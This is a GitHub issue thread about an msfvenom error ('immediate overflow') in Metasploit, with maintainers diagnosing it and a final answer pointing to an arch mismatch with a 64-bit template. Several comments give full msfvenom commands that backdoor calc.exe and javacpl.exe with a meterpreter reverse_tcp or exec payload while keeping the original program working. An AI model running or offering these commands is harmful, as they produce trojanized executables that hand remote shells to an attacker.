### ISSUE TITLE
Cannot generate payload with msfvenom

### ISSUE THREAD

**Issue by roymustangnet** [rapid7/metasploit-framework#6538]
I use the Kali 2.0 VMware  and download it from https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/. When I use the command like that

msfvenom -a x86 --platform windows -x /root/calc.exe -k -f exe -o /root/calc1.exe -e x86/shikata_ga_nai -i 1 -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=12345

I get the Error info :

```
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Error: immediate overflow :a32 1000e3031h "\"<unk>\"" line 4
```

what can i do to solve it ?

**Comment by jlee-r7** [comment]
Have you updated? I don't see this on latest master.
```
$ ./msfvenom -a x86 --platform windows -x calc_win7.exe -k -f exe -o /tmp/calc1.exe -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=12345
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Saved as: /tmp/calc1.exe
```

**Comment by wvu-r7** [comment]
Don't see this on Kali 2.0

**Comment by roymustangnet** [comment]
@jlee-r7 I have used msfupdate to update the MSF, but the problem is still.

**Comment by roymustangnet** [comment]
@wvu-r7 
I got the same error info when I use Parrot Security
`┌─[root@parrot]─[~]
└──╼ #msfvenom -a x86 --platform windows -x /root/calc.exe -k -f exe -o /tmp/calc1.exe -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=12345
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Error: immediate overflow :a32 1000e3031h "\"<unk>\"" line 4
`

**Comment by bcook-r7** [comment]
Is the system you are working on 32-bit? What does 'uname -a' show ?

**Comment by jlee-r7** [comment]
This used to happen in our executable creation code when the thread stub got to be larger than 255; we were generating assembly to jump to the end with a `\xeb` jmp (4-byte relative offset) instead of a `\xe9` (1-byte relative offset)

I haven't seen it in a long time.

**Comment by jlee-r7** [comment]
@roymustangnet does this happen every time for you? What does `version` from inside msfconsole say?

**Comment by roymustangnet** [comment]
@jlee-r7 Yes, this happen every time for me. The version is metasploit v4.11.9-dev

**Comment by roymustangnet** [comment]
@bcook-r7 
`Linux kali 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-7kali2 (2016-01-27) x86_64 GNU/Linux`

**Comment by bcook-r7** [comment]
Looks like a metasm 32-bit ruby error. @jjyg could you take a look?

**Comment by eapolsniper** [comment]
im also having this issue using latest metasploit from PTF. any update?

**Comment by bcook-r7** [comment]
We should probably look at releasing an updated metasm gem. @egypt, do you have authorship rights?

**Comment by egypt** [comment]
@bcook-r7 I do, but I don't see any changes since the last update that would affect this.

@eapolsniper Can you paste your exact `msfvenom` command?  Are you using `-k` flag?  What template executable are you using?

**Comment by abdurrahman-nasr** [comment]
@egypt, for me, I have enabled the -k option. when i removed it, it worked. But what is the reason

**Comment by benjholla** [comment]
I am getting this error with Kali 2017.1 VMWare image.

> msfvenom --payload=windows/exec cmd=calc.exe EXITFUNC=thread --template=javacpl.exe --keep --platform=windows --arch=x86 --bad-chars='\x00\x0a\x0d' --format=exe --out javacpl-evil.exe
> Found 10 compatible encoders
> Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
> x86/shikata_ga_nai succeeded with size 220 (iteration=0)
> x86/shikata_ga_nai chosen with final size 220
> Payload size: 220 bytes
> Error: immediate overflow :a32 140017031h "\"<unk>\"" line 4

Binary template is the javacpl.exe update client included in Oracle's JRE in the bin folder. As @abdurrahman-nasr mentioned removing the `--keep` option does not produce the error, but it seems to produce a corrupted binary for me.

**Comment by benjholla** [comment]
Actually more likely removing the corrupted binary was due to some sort of protections in the update client. I'm not sure why `--keep` doesn't cause errors though.

**Comment by jimmyb86** [comment]
You get this error if you specify wrong arch, try to use template from 32bit program instead and it would work. You are using a 64bit template and trying to make it into a 32bit (x86) executable.

**Comment by sohail89** [comment]
@jimmyb86   
very good

**Comment by fsacer** [comment]
this can probably get closed
